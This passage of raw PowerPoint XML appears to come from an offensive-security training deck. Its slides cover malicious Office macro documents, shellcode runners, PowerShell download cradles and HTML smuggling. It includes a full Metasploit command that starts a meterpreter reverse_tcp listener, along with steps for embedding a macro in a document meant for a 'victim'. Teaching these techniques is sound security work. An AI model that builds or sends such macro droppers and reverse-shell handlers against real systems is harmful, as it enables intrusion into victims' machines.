              <a:t>-exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The first part of the script is created as a macro and the second part is appended into the document text itself. You will need to transfer this script over to a machine with Windows and Office installed and perform the following</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Word/Excel 2003: Tools -&gt; Macros -&gt; Visual Basic Editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Word/Excel 2007: View Macros -&gt; then place a name like "moo" and select "create".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="17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30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3D2EE6C2-5580-8316-38F5-887D2CA50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089" y="1385326"/>
            <a:ext cx="4267200" cy="34956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A1FDC4E-7DD0-3201-17B8-55D330394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303" y="1067640"/>
            <a:ext cx="6621608" cy="41310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308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190F-6985-0345-B0DE-BCF1124CBBFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="58060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8CC9219-B053-E2C0-F08B-BEC163FC3879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1264024"/>
            <a:ext cx="10753725" cy="4513841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Before we send off our malicious document to our victim, we first need to set up our Metasploit listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -x "use exploit/multi/handler; set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Now we can test out the document by opening it up and check back to where we have our Metasploit exploit/multi/handler listener:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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B4A6084-75F5-32D6-091D-4D93D4D2A49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="35147" t="44444" r="14779" b="18431"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2698376" y="3520944"/>
            <a:ext cx="6104966" cy="2545976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3602153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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="329863"/>
            <a:ext cx="10772775" cy="750272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shellcode Runners in Offensive Security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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1013012"/>
            <a:ext cx="11067109" cy="5360894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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Shellcode runners, also referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload execution engines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, are vital components in offensive security testing.</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the context of offensive security testing, shellcode runners serve as the means to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>execute arbitrary code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>within a targeted system or application.</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They act as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>catalysts, facilitating the process of exploiting vulnerabilities in order to gain unauthorized access, escalate privileges, or achieve other objectives that may compromise the security of a system.</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concept of shellcode runners revolves around their ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>interpret and execute specific instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, known as shellcode or payload. </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Shellcode is a series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>low level, often platform-specific instructions written in machine code or assembly language. </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It is designed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>injected into a running process or system, bypassing conventional security measures and granting the attacker control over the targeted system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3179253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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="329863"/>
            <a:ext cx="10772775" cy="750272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shellcode Runners in Offensive Security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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1013012"/>
            <a:ext cx="11067109" cy="5360894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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By utilizing shellcode runners in offensive security testing, security researchers and penetration testers can:</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Identify weaknesses in a system's security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>by simulating real-world attacks.</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Develop countermeasures and mitigation strategies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>by understanding the potential impact of an exploit.</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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Improve the overall security posture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> of a system by identifying and remediating vulnerabilities before they are exploited by malicious actors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1498826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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="329863"/>
            <a:ext cx="10772775" cy="750272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PowerShell Download Cradle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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1013012"/>
            <a:ext cx="10753725" cy="4764853"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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 PowerShell download cradle is a technique that allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>users to download and execute code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> on a target system using PowerShell scripts. </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By utilizing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>built-in functions and cmdlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, engineers can retrieve remote resources, such as files or scripts, and execute them directly in-memory. </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This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>avoids writing to disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reduces the chances of triggering security mechanisms like antivirus software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>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031EB0CB-1D94-3871-507A-956A75A7B80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>https://locall.host/what-is-a-powershell-download-cradle/?expand_article=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42705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6584-3CDA-3423-027A-385CCF7A3ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="719667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML Smuggling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9816A58E-47E8-9561-A2A7-B112D3BB7DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="1488141"/>
            <a:ext cx="10839326" cy="4448048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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HTML smuggling is a technique used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>downloaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> to evade detection and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>deliver malicious content by hiding it within HTML code.</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attacker can embed the malicious payload inside the HTML code and use various encoding techniques to bypass security measures such as firewalls or antivirus software. </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real-world example of an HTML smuggling attack is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML_Smokeloader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="5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campaign that was discovered in 2018. This campaign used HTML smuggling to deliver a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>banking Trojan to victims </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
